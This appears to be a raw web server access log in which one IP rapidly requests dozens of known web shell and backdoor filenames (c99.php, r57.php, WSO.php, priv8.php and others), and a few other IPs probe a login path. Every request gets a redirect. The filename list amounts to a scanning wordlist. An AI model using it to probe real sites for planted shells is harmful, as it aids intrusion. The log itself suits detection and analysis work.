- [12/Aug/2025:15:30:30 -0400] "GET //m.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:31 -0400] "GET //Lux.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:33 -0400] "GET //haxor.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:34 -0400] "GET //shell.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:35 -0400] "GET //osx.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:36 -0400] "GET //send.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:37 -0400] "GET //uplo.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:39 -0400] "GET //upload.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:40 -0400] "GET //osx.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:41 -0400] "GET //wp-content.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:42 -0400] "GET //wp-upload.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:43 -0400] "GET //wp-mail.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:45 -0400] "GET //404.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:46 -0400] "GET //asad.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:47 -0400] "GET //wp-admin.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:48 -0400] "GET //smtp.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:50 -0400] "GET //azerty.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:51 -0400] "GET //dell.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:52 -0400] "GET //WSO.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:53 -0400] "GET //dz.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:54 -0400] "GET //cpanel.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:55 -0400] "GET //cpn.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:57 -0400] "GET //sql.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:58 -0400] "GET //mysql.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:59 -0400] "GET //madspot.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:00 -0400] "GET //cp.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:01 -0400] "GET //cpbt.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:02 -0400] "GET //sYm.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:04 -0400] "GET //x.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:05 -0400] "GET //r99.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:06 -0400] "GET //lol.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:07 -0400] "GET //jo.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:08 -0400] "GET //wp.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:09 -0400] "GET //whmcs.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:11 -0400] "GET //shellz.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:12 -0400] "GET //d0main.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:13 -0400] "GET //d0mains.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:14 -0400] "GET /users.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:15 -0400] "GET //Cgishell.pl HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:16 -0400] "GET //killer.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:18 -0400] "GET //changeall.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:19 -0400] "GET //2.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:20 -0400] "GET //Sh3ll.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:21 -0400] "GET //dz0.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:22 -0400] "GET //dam.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:24 -0400] "GET //user.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:26 -0400] "GET //dom.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:27 -0400] "GET //whmcs.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:28 -0400] "GET //r00t.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:29 -0400] "GET //c99.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:30 -0400] "GET //gaza.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:31 -0400] "GET //1.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:33 -0400] "GET //wp.zip HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:34 -0400] "GET /madspotshell.php HTTP/1.1" 301 247 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:35 -0400] "GET //Sym.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:36 -0400] "GET //c22.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:37 -0400] "GET //c100.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:39 -0400] "GET //Cpanel.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:40 -0400] "GET //cp.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:41 -0400] "GET //madspotshell.php HTTP/1.1" 301 247 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:42 -0400] "GET /L3b.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:43 -0400] "GET /d.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:44 -0400] "GET /tmp/d.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:46 -0400] "GET /tmp/L3b.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:47 -0400] "GET /admin1.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:48 -0400] "GET /upload.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:49 -0400] "GET /up.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:50 -0400] "GET /vb.zip HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:51 -0400] "GET /vb.rar HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:53 -0400] "GET /admin2.asp HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:54 -0400] "GET /uploads.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:55 -0400] "GET /sa.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:56 -0400] "GET /sysadmins/ HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:58 -0400] "GET /admin1/ HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:31:59 -0400] "GET /administration/Sym.php HTTP/1.1" 301 253 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:00 -0400] "GET /images/Sym.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:01 -0400] "GET //r57.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:02 -0400] "GET //shell.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:03 -0400] "GET //sa.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:05 -0400] "GET //admin.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:06 -0400] "GET //sa2.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:07 -0400] "GET //2.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:08 -0400] "GET /gaza.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:09 -0400] "GET /up.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:10 -0400] "GET //upload.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:12 -0400] "GET /uploads.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:13 -0400] "GET /shell.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:14 -0400] "GET /amad.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:15 -0400] "GET /t00.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:16 -0400] "GET /dz.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:17 -0400] "GET /Black.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:19 -0400] "GET /asp.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:20 -0400] "GET /whmcs.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:21 -0400] "GET /d0maine.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:22 -0400] "GET /tmp/sql.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:23 -0400] "GET /tmp/dz1.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:24 -0400] "GET /dz1.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:26 -0400] "GET /Symlink.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:27 -0400] "GET /wp.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:28 -0400] "GET /sysadmin.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:29 -0400] "GET /images/c99.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:30 -0400] "GET /xd.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:31 -0400] "GET /c100.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:33 -0400] "GET /spy.aspx HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:34 -0400] "GET /xd.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:35 -0400] "GET /Server.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:36 -0400] "GET /wp-admin/c99.php HTTP/1.1" 301 247 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:37 -0400] "GET /tmp/priv8.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 209.38.125.40 - - [12/Aug/2025:15:32:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:15:32:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:15:32:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:15:32:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 41.142.204.231 - - [12/Aug/2025:15:32:38 -0400] "GET /priv8.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:40 -0400] "GET /cgi.pl HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:41 -0400] "GET /tmp/cgi.pl HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:42 -0400] "GET /downloads/dom.php HTTP/1.1" 301 248 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:44 -0400] "GET /webadmin.html HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:45 -0400] "GET /admins.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:46 -0400] "GET /admins.asp HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:47 -0400] "GET /admins.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:49 -0400] "GET /wp.zip HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:50 -0400] "GET /a.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:51 -0400] "GET /w.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:52 -0400] "GET /1.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:53 -0400] "GET /2.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:54 -0400] "GET /3.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:56 -0400] "GET /4.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:57 -0400] "GET /5.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:58 -0400] "GET /6.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:32:59 -0400] "GET /3x.php HTTP/1.1" 301 237 